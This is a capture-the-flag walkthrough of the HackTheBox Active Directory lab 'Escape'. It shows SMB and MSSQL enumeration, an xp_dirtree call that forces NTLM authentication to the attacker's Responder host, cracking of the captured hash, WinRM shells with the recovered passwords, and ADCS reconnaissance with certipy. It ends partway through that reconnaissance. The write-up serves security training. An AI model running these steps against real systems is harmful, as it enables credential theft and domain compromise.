Escape

AD box on HTB.

Enumeration:

Port Scanning:

We will start with nmap:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]                                 
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 10.129.128.53
Nmap scan report for 10.129.128.53                                                                                                                                         
Host is up, received echo-reply ttl 127 (0.12s latency).                                                                                                                   
Scanned at 2025-09-11 13:58:27 +03 for 284s                                                                                                                                
Not shown: 65515 filtered tcp ports (no-response)                                    
PORT      STATE SERVICE       REASON          VERSION                                                                                                                      
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus                                                                                                              
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-09-11 18:59:11Z)                                                               
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC                                                                                                        
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn                                                                                                
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)                                
|_ssl-date: 2025-09-11T19:01:15+00:00; +8h00m04s from scanner time.                  
| ssl-cert: Subject:                                                                 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel            
| Issuer: commonName=sequel-DC-CA/domainComponent=sequel                                                                                                                   
| Public Key type: rsa                                                                                                                                                     
| Public Key bits: 2048                                                                                                                                                    
| Signature Algorithm: sha256WithRSAEncryption                                                                                                                             
| Not valid before: 2024-01-18T23:03:57                                                                                                                                    
| Not valid after:  2074-01-05T23:03:57                                                                                                                                    
| MD5:   ee4c:c647:ebb2:c23e:f472:1d70:2880:9d82                                                                                                                           
| SHA-1: d88d:12ae:8a50:fcf1:2242:909e:3dd7:5cff:92d1:a480                                                                                                                 
| -----BEGIN CERTIFICATE-----                                                                                                                                              
| MIIFkTCCBHmgAwIBAgITHgAAAAsyZYRdLEkTIgAAAAAACzANBgkqhkiG9w0BAQsF
<snipped>
|_-----END CERTIFICATE-----
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-11T19:01:15+00:00; +8h00m03s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-01-18T23:03:57
| Not valid after:  2074-01-05T23:03:57
| MD5:   ee4c:c647:ebb2:c23e:f472:1d70:2880:9d82
| SHA-1: d88d:12ae:8a50:fcf1:2242:909e:3dd7:5cff:92d1:a480
| -----BEGIN CERTIFICATE-----
| MIIFkTCCBHmgAwIBAgITHgAAAAsyZYRdLEkTIgAAAAAACzANBgkqhkiG9w0BAQsF
<snipped>
|_-----END CERTIFICATE-----                                                                                                                              14:06:22 [128/589]
1433/tcp  open  ms-sql-s      syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info: 
|   10.129.128.53:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019 
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ms-sql-ntlm-info: 
|   10.129.128.53:1433: 
|     Target_Name: sequel
|     NetBIOS_Domain_Name: sequel
|     NetBIOS_Computer_Name: DC
|     DNS_Domain_Name: sequel.htb
|     DNS_Computer_Name: dc.sequel.htb
|     DNS_Tree_Name: sequel.htb
|_    Product_Version: 10.0.17763
|_ssl-date: 2025-09-11T19:01:16+00:00; +8h00m04s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-09-11T18:42:20
| Not valid after:  2055-09-11T18:42:20
| MD5:   0819:6d15:add6:80f6:58a8:40b0:e112:6b85
| SHA-1: 4979:7601:7304:1196:3673:6d78:ae9f:807a:bbce:d5be
| -----BEGIN CERTIFICATE-----
| MIIDADCCAeigAwIBAgIQSmZ8PTuaSZBK6Dp3OwmheTANBgkqhkiG9w0BAQsFADA7
<snipped>
|_-----END CERTIFICATE-----
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-01-18T23:03:57
| Not valid after:  2074-01-05T23:03:57
| MD5:   ee4c:c647:ebb2:c23e:f472:1d70:2880:9d82
| SHA-1: d88d:12ae:8a50:fcf1:2242:909e:3dd7:5cff:92d1:a480
| -----BEGIN CERTIFICATE-----
| MIIFkTCCBHmgAwIBAgITHgAAAAsyZYRdLEkTIgAAAAAACzANBgkqhkiG9w0BAQsF
<snipped>
|_-----END CERTIFICATE-----
|_ssl-date: 2025-09-11T19:01:16+00:00; +8h00m04s from scanner time.
3269/tcp  open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-01-18T23:03:57
| Not valid after:  2074-01-05T23:03:57
| MD5:   ee4c:c647:ebb2:c23e:f472:1d70:2880:9d82
| SHA-1: d88d:12ae:8a50:fcf1:2242:909e:3dd7:5cff:92d1:a480
| -----BEGIN CERTIFICATE-----
| MIIFkTCCBHmgAwIBAgITHgAAAAsyZYRdLEkTIgAAAAAACzANBgkqhkiG9w0BAQsF
<snipped>
|_-----END CERTIFICATE-----
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49689/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49690/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49715/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49724/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49745/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

<snipped>
|_clock-skew: mean: 8h00m03s, deviation: 0s, median: 8h00m03s

<snipped>

I will sync the time with the target using ntpdate:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]                                                                                                                       
└─$ sudo ntpdate 10.129.128.53                                                       
2025-09-11 22:05:18.276674 (+0300) +28803.869813 +/- 0.120404 10.129.128.53 s1 no-leap                                                                                     
CLOCK: time stepped by 28803.869813

Lets get the FQDN of the target:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]                                 
└─$ netexec smb 10.129.128.53                                                                                                                                              
SMB         10.129.128.53   445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)

I will add it to the hosts file with its corresponding IP address:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]                                 
└─$ cat /etc/hosts                                                                                                                                                         
127.0.0.1       localhost                                                            
127.0.1.1       kali                                                                 
<snipped>                                                                                                                                          
                                                                                                                                                                           
10.129.128.53 DC.sequel.htb sequel.htb DC

First we will enumerate the shares with guest session via netexec:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]                                                                                                                       
└─$ netexec smb dc.sequel.htb -u 'guest' -p '' --shares                                                                                                                    
SMB         10.129.128.53   445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)                
SMB         10.129.128.53   445    DC               [+] sequel.htb\guest:                                                                                                  
SMB         10.129.128.53   445    DC               [*] Enumerated shares                                                                                                  
SMB         10.129.128.53   445    DC               Share           Permissions     Remark                                                                                 
SMB         10.129.128.53   445    DC               -----           -----------     ------                                                                                 
SMB         10.129.128.53   445    DC               ADMIN$                          Remote Admin                                                                           
SMB         10.129.128.53   445    DC               C$                              Default share                                                                          
SMB         10.129.128.53   445    DC               IPC$            READ            Remote IPC                                                                             
SMB         10.129.128.53   445    DC               NETLOGON                        Logon server share                                                                     
SMB         10.129.128.53   445    DC               Public          READ                                                                                                   
SMB         10.129.128.53   445    DC               SYSVOL                          Logon server share

We have one non-default share called Public, we also have read persmissions over it.

I will use smbclient to interact with this share:

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Escape/smb]                                                                                                                       
└─$ smbclient //10.129.128.53/Public                                                                                                                                       
Password for [WORKGROUP\kali]:                                                                                                                                             
Try "help" to get a list of possible commands.                                                                                                                             
smb: \> dir                                                                                                                                                                
  .                                   D        0  Sat Nov 19 14:51:25 2022                                                                                                 
  ..                                  D        0  Sat Nov 19 14:51:25 2022                                                                                                 
  SQL Server Procedures.pdf           A    49551  Fri Nov 18 16:39:43 2022                                                                                                 
                                                                                                                                                                           
                5184255 blocks of size 4096. 1466963 blocks available                                                                                                                                                                                                                                            
smb: \> mget *                                                                                                                                                             
Get file SQL Server Procedures.pdf? y                                                                                                                                      
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (34.2 KiloBytes/sec) (average 34.2 KiloBytes/sec)                                       
smb: \> exit

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Escape/smb]                                                                                                                       
└─$ open SQL\ Server\ Procedures.pdf

We have one pdf file.

Lets open it up:

We will find credentials for the new hired employee: PublicUser:GuestUserCanWrite1, and with those credentials we can authenticate to the database.

Exploitation:

Check if those credentials are still valid using netexec:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]
└─$ netexec mssql dc.sequel.htb -u PublicUser -p GuestUserCantWrite1 --local-auth
MSSQL       10.129.128.53   1433   DC               [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
MSSQL       10.129.128.53   1433   DC               [+] DC\PublicUser:GuestUserCantWrite1

Nice, we can see the + sign which indicate they are still valid.

I will use the impacket-mssqlclient to authenticate to the database, and try to paly with it:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]                                                                                                                       
└─$ impacket-mssqlclient sequel.htb/publicuser:GuestUserCantWrite1@10.129.128.53                                                                                           
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies                                                                                                 
                                                                                                                                                                           
[*] Encryption required, switching to TLS                                                                                                                                  
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master                                                                                                              
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english                                                                                                                
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192                                                                                                               
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.                                                                                                        
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.                                                                                                      
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)                                                                                                                       
[!] Press help for extra shell commands                                                                                                                                    
SQL (PublicUser  guest@master)>

Enumerate the database:

SQL (PublicUser  guest@master)> select name from master..sysdatabases;
name     
------   
master   
tempdb   
model    
msdb

Nothing useful, all those databases are default ones.

MSSQL dbms has interesting feature that if misconfigured, we can view the internal system directories using the xp_dirtree command.

But we can not do anything even if we can view the directories, but what we can take advantage of is since we are in the same network, we can abuse LLMNR poisoning again.

Before executing the command above we will run responder to listen to any net ntlm hashes:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]                                                                                                                       
└─$ sudo responder -I tun0 -dvw                                                                                                                                            
[sudo] password for kali:                                                                                                                                                  
                                         __                                                                                                                                
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.                                                                                                                   
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|                                                                                                                   
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|                                                                                                                     
                   |__|                                                                                                                                                    
                                                                                                                                                                           
                                                                                                                                                                           
[+] Poisoners:                                                                                                                                                             
    LLMNR                      [ON]                                                                                                                                        
    NBT-NS                     [ON]                                                                                                                                        
    MDNS                       [ON]                                                                                                                                        
    DNS                        [ON]                                                                                                                                        
    DHCP                       [ON]                                                                                                                                        
                                                                                                                                                                           
[+] Servers:                                                                                                                                                               
    HTTP server                [ON]                                                                                                                                        
    HTTPS server               [ON]                                                                                                                                        
    WPAD proxy                 [ON]                                                                                                                                        
    Auth proxy                 [OFF]                                                                                                                                       
    SMB server                 [ON]                                                                                                                                        
    Kerberos server            [ON]                                                                                                                                        
    SQL server                 [ON]                                                                                                                                        
    FTP server                 [ON]                                                                                                                                        
    IMAP server                [ON]                                                                                                                                        
    POP3 server                [ON]                                                                                                                                        
    SMTP server                [ON]                                                                                                                                        
    DNS server                 [ON]                                                                                                                                        
    LDAP server                [ON]                                                                                                                                        
    MQTT server                [ON]                                                                                                                                        
    RDP server                 [ON]                                                                                                                                        
    DCE-RPC server             [ON]                                                                                                                                        
    WinRM server               [ON]                                                                                                                                        
    SNMP server                [ON]                                                                                                                                                                                                                                                                                                                   
[+] HTTP Options:                                                                                                                                                          
    Always serving EXE         [OFF]                                                                                                                                       
    Serving EXE                [OFF]                                                                                                                                       
    Serving HTML               [OFF]                                                                                                                                       
    Upstream Proxy             [OFF]
    
[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.16.7]
    Responder IPv6             [dead:beef:4::1005]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']
    Don't Respond To MDNS TLD  ['_DOSVC']
    TTL for poisoned response  [default]

[+] Current Session Variables:
    Responder Machine Name     [WIN-INB06VAZIW7]
    Responder Domain Name      [L8LZ.LOCAL]
    Responder DCE-RPC Port     [46414]

[*] Version: Responder 3.1.7.0
[*] Author: Laurent Gaffie, <lgaffie@secorizon.com>
[*] To sponsor Responder: https://paypal.me/PythonResponder

[+] Listening for events...

Run the command:

SQL (PublicUser  guest@master)> xp_dirtree \\10.10.16.7\share\doesnotexist
subdirectory   depth   file   
------------   -----   ----

[SMB] NTLMv2-SSP Client   : 10.129.128.53
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash     : sql_svc::sequel:4c2b3e3ba4d29146:DBE407CE9436C7E96B6ECF457B7A8000:0101000000000000808145C82623DC0134CB90D74E0C86B100000000020008004C0038004C005
A0001001E00570049004E002D0049004E00420030003600560041005A0049005700370004003400570049004E002D0049004E00420030003600560041005A004900570037002E004C0038004C005A002E004C004F00
430041004C00030014004C0038004C005A002E004C004F00430041004C00050014004C0038004C005A002E004C004F00430041004C0007000800808145C82623DC01060004000200000008003000300000000000000
00000000000300000DF274434FF68EE63F87F201C8E31C8F943F0AC0D138B5D624D09CB4A7216EEEE0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E
00310036002E0037000000000000000000        
[+] Exiting...

Here we received the hash of the user running this service, if we could not crack his password, we can attempt to try to relay it to other services.

Shell as sql_svc:

Save the hash into a file and crack it using hashcat:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]
└─$ hashcat sql_svc.hash --show                          
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

5600 | NetNTLMv2 | Network Protocol

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.

SQL_SVC::sequel:4c2b3e3ba4d29146:dbe407ce9436c7e96b6ecf457b7a8000:0101000000000000808145c82623dc0134cb90d74e0c86b100000000020008004c0038004c005a0001001e00570049004e002d0049004e00420030003600560041005a0049005700370004003400570049004e002d0049004e00420030003600560041005a004900570037002e004c0038004c005a002e004c004f00430041004c00030014004c0038004c005a002e004c004f00430041004c00050014004c0038004c005a002e004c004f00430041004c0007000800808145c82623dc0106000400020000000800300030000000000000000000000000300000df274434ff68ee63f87f201c8e31c8f943f0ac0d138b5d624d09cb4a7216eeee0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0037000000000000000000:REGGIE1234ronnie

Cool, we were able to crack it, and now we have another valid username, and password.

We can check if we can use those username, and password to authenticate to the machine via WinRM:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]                                                                                                                       
└─$ netexec mssql dc.sequel.htb -u sql_svc -p REGGIE1234ronnie                                                                                                             
MSSQL       10.129.128.53   1433   DC               [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)                                                 
MSSQL       10.129.128.53   1433   DC               [+] sequel.htb\sql_svc:REGGIE1234ronnie

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]                     
└─$ netexec winrm dc.sequel.htb -u sql_svc -p REGGIE1234ronnie                        
WINRM       10.129.128.53   5985   DC               [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 a
nd will be removed from this module in 48.0.0.                                  
  arc4 = algorithms.ARC4(self._key)                                                  
WINRM       10.129.128.53   5985   DC               [+] sequel.htb\sql_svc:REGGIE1234ronnie (Pwn3d!)

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]                                 
└─$ evil-winrm -i 10.129.128.53 -u sql_svc -p REGGIE1234ronnie                       
                                                                                     
Evil-WinRM shell v3.7                                                                                                                                                      
                                                                                                                                                                           
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline                                           
                                                                                                                                                                           
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                      
                                                                                                                                                                           
Info: Establishing connection to remote endpoint                                                                                                                           
*Evil-WinRM* PS C:\Users\sql_svc\Documents>

We authenticated as sql_svc user.

Lateral Movement to ryan.cooper:

After doing some enumeration, we will find an appealing folder in the root of the file system:

*Evil-WinRM* PS C:\> dir


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         2/1/2023   8:15 PM                PerfLogs
d-r---         2/6/2023  12:08 PM                Program Files
d-----       11/19/2022   3:51 AM                Program Files (x86)
d-----       11/19/2022   3:51 AM                Public
d-----         2/1/2023   1:02 PM                SQLServer
d-r---         2/1/2023   1:55 PM                Users
d-----         2/6/2023   7:21 AM                Windows

We can navigate to that folder, and view what it contains:

*Evil-WinRM* PS C:\> cd sqlserver
*Evil-WinRM* PS C:\sqlserver> dir


    Directory: C:\sqlserver


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         2/7/2023   8:06 AM                Logs
d-----       11/18/2022   1:37 PM                SQLEXPR_2019
-a----       11/18/2022   1:35 PM        6379936 sqlexpress.exe
-a----       11/18/2022   1:36 PM      268090448 SQLEXPR_x64_ENU.exe


*Evil-WinRM* PS C:\sqlserver>

Another interesting folder (Logs):

*Evil-WinRM* PS C:\sqlserver> cd logs
*Evil-WinRM* PS C:\sqlserver\logs> dir                                                                                                                   14:27:40 [192/396]


    Directory: C:\sqlserver\logs


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         2/7/2023   8:06 AM          27608 ERRORLOG.BAK

We have errorlog backup file, lets read it:

*Evil-WinRM* PS C:\sqlserver\logs> type errorlog.bak
2022-11-18 13:43:05.96 Server      Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)
        Sep 24 2019 13:48:23
        Copyright (C) 2019 Microsoft Corporation
        Express Edition (64-bit) on Windows Server 2019 Standard Evaluation 10.0 <X64> (Build 17763: ) (Hypervisor)

2022-11-18 13:43:05.97 Server      UTC adjustment: -8:00
<snipped>                                                                                               
2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]         
2022-11-18 13:43:07.48 Logon       Error: 18456, Severity: 14, State: 8.                                                                                                   
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]               
2022-11-18 13:43:07.72 spid51      Attempting to load library 'xpstar.dll' into memory. This is an informational message only. No user action is required.                 
<snipped>

We will notice some entries has some juicy information, lets test those out using netexec:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]                                                                                                                       
└─$ netexec smb dc.sequel.htb -u ryan.cooper -p 'NuclearMosquito3'                                                                                                         
SMB         10.129.128.53   445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False) 
SMB         10.129.128.53   445    DC               [+] sequel.htb\ryan.cooper:NuclearMosquito3     
                                                                                                                                                                           
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]                                                                                                                       
└─$ netexec winrm dc.sequel.htb -u ryan.cooper -p 'NuclearMosquito3'                                                                                                      
WINRM       10.129.128.53   5985   DC               [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 a
nd will be removed from this module in 48.0.0.                                       
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.128.53   5985   DC               [+] sequel.htb\ryan.cooper:NuclearMosquito3 (Pwn3d!)

Indeed they are valid, and still valid.

BloodHound:

It is time for bloodhound:

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Escape/bloodhound]                                                                                               14:46:09 [24/238]
└─$ rusthound-ce -u ryan.cooper -p NuclearMosquito3 -d sequel.htb -f dc.sequel.htb -i 10.129.128.53 -n 10.129.128.53 -P 636                                                
---------------------------------------------------                                                                                                                        
Initializing RustHound-CE at 14:46:01 on 09/11/25                                                                                                                          
Powered by @g0h4n_0                                                                                                                                                        
---------------------------------------------------                                                                                                                        
                                                                                                                                                                           
[2025-09-11T11:46:01Z INFO  rusthound_ce] Verbosity level: Info                                                                                                            
[2025-09-11T11:46:01Z INFO  rusthound_ce] Collection method: All                                                                                                           
[2025-09-11T11:46:02Z INFO  rusthound_ce::ldap] Connected to SEQUEL.HTB Active Directory!                                                                                  
[2025-09-11T11:46:02Z INFO  rusthound_ce::ldap] Starting data collection...                                                                                                
[2025-09-11T11:46:02Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)                                                                                              
[2025-09-11T11:46:04Z INFO  rusthound_ce::ldap] All data collected for NamingContext DC=sequel,DC=htb                                                                      
[2025-09-11T11:46:04Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)                                                                                              
[2025-09-11T11:46:06Z INFO  rusthound_ce::ldap] All data collected for NamingContext CN=Configuration,DC=sequel,DC=htb                                                     
[2025-09-11T11:46:06Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)                                                                                              
[2025-09-11T11:46:08Z INFO  rusthound_ce::ldap] All data collected for NamingContext CN=Schema,CN=Configuration,DC=sequel,DC=htb                                           
[2025-09-11T11:46:08Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)                                                                                              
[2025-09-11T11:46:09Z INFO  rusthound_ce::ldap] All data collected for NamingContext DC=DomainDnsZones,DC=sequel,DC=htb                                                    
[2025-09-11T11:46:09Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)                                                                                              
[2025-09-11T11:46:09Z INFO  rusthound_ce::ldap] All data collected for NamingContext DC=ForestDnsZones,DC=sequel,DC=htb                                                    
[2025-09-11T11:46:09Z INFO  rusthound_ce::api] Starting the LDAP objects parsing...                                                                                        
⢀ Parsing LDAP objects: 1%                                                                                                                                                 
[2025-09-11T11:46:09Z INFO  rusthound_ce::objects::enterpriseca] Found 12 enabled certificate templates                                                                    
[2025-09-11T11:46:09Z INFO  rusthound_ce::api] Parsing LDAP objects finished!                                                                                              
[2025-09-11T11:46:09Z INFO  rusthound_ce::json::checker] Starting checker to replace some values...
[2025-09-11T11:46:09Z INFO  rusthound_ce::json::checker] Checking and replacing some values finished!
[2025-09-11T11:46:09Z INFO  rusthound_ce::json::maker::common] 10 users parsed!
[2025-09-11T11:46:09Z INFO  rusthound_ce::json::maker::common] .//20250911144609_sequel-htb_users.json created!
[2025-09-11T11:46:09Z INFO  rusthound_ce::json::maker::common] 61 groups parsed!
[2025-09-11T11:46:09Z INFO  rusthound_ce::json::maker::common] .//20250911144609_sequel-htb_groups.json created!
[2025-09-11T11:46:09Z INFO  rusthound_ce::json::maker::common] 1 computers parsed!
[2025-09-11T11:46:09Z INFO  rusthound_ce::json::maker::common] .//20250911144609_sequel-htb_computers.json created!
[2025-09-11T11:46:09Z INFO  rusthound_ce::json::maker::common] 1 ous parsed!
[2025-09-11T11:46:09Z INFO  rusthound_ce::json::maker::common] .//20250911144609_sequel-htb_ous.json created!
[2025-09-11T11:46:09Z INFO  rusthound_ce::json::maker::common] 3 domains parsed!
[2025-09-11T11:46:09Z INFO  rusthound_ce::json::maker::common] .//20250911144609_sequel-htb_domains.json created!
[2025-09-11T11:46:09Z INFO  rusthound_ce::json::maker::common] 2 gpos parsed!
[2025-09-11T11:46:09Z INFO  rusthound_ce::json::maker::common] .//20250911144609_sequel-htb_gpos.json created!
[2025-09-11T11:46:09Z INFO  rusthound_ce::json::maker::common] 74 containers parsed!
[2025-09-11T11:46:09Z INFO  rusthound_ce::json::maker::common] .//20250911144609_sequel-htb_containers.json created!
[2025-09-11T11:46:09Z INFO  rusthound_ce::json::maker::common] 1 ntauthstores parsed!
[2025-09-11T11:46:09Z INFO  rusthound_ce::json::maker::common] .//20250911144609_sequel-htb_ntauthstores.json created!
[2025-09-11T11:46:09Z INFO  rusthound_ce::json::maker::common] 1 aiacas parsed!
[2025-09-11T11:46:09Z INFO  rusthound_ce::json::maker::common] .//20250911144609_sequel-htb_aiacas.json created!
[2025-09-11T11:46:09Z INFO  rusthound_ce::json::maker::common] 1 rootcas parsed!
[2025-09-11T11:46:09Z INFO  rusthound_ce::json::maker::common] .//20250911144609_sequel-htb_rootcas.json created!
[2025-09-11T11:46:09Z INFO  rusthound_ce::json::maker::common] 1 enterprisecas parsed!
[2025-09-11T11:46:09Z INFO  rusthound_ce::json::maker::common] .//20250911144609_sequel-htb_enterprisecas.json created!
[2025-09-11T11:46:09Z INFO  rusthound_ce::json::maker::common] 34 certtemplates parsed!
[2025-09-11T11:46:09Z INFO  rusthound_ce::json::maker::common] .//20250911144609_sequel-htb_certtemplates.json created!
[2025-09-11T11:46:09Z INFO  rusthound_ce::json::maker::common] 3 issuancepolicies parsed!
[2025-09-11T11:46:09Z INFO  rusthound_ce::json::maker::common] .//20250911144609_sequel-htb_issuancepolicies.json created!

RustHound-CE Enumeration Completed at 14:46:09 on 09/11/25! Happy Graphing!

Also run bloodhound:

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Escape/bloodhound]
└─$ sudo bloodhound            

 Starting neo4j
Neo4j is not running.
<snipped>
......................................................
 Bloodhound will start

 IMPORTANT: It will take time, please wait...
 
<snipped>

 opening http://127.0.0.1:8080

Upload the ingested data to bloodhound.

After some exploration, we will find this attack path to get domain admins on the domain by abusing ADCS ESC1.

Post-Exploitation:

Lets collect the ADCS data with certipy-ad, and add -vulnerable to the command, to only show the vulnerable templates:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]
└─$ certipy-ad find -u ryan.cooper -p NuclearMosquito3 -dc-ip 10.129.128.53 -vulnerable                                                                                   
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates 
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'sequel-DC-CA' via RRP
[*] Successfully retrieved CA configuration for 'sequel-DC-CA'
[*] Checking web enrollment for CA 'sequel-DC-CA' @ 'dc.sequel.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Saving text output to '20250911143138_Certipy.txt'
[*] Wrote text output to '20250911143138_Certipy.txt'
[*] Saving JSON output to '20250911143138_Certipy.json'
[*] Wrote JSON output to '20250911143138_Certipy.json'

ADCS Abuse:

Read the output:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]                                                                                                     14:31:46 [173/366]
└─$ cat 20250911143138_Certipy.txt                                                                                                                                         
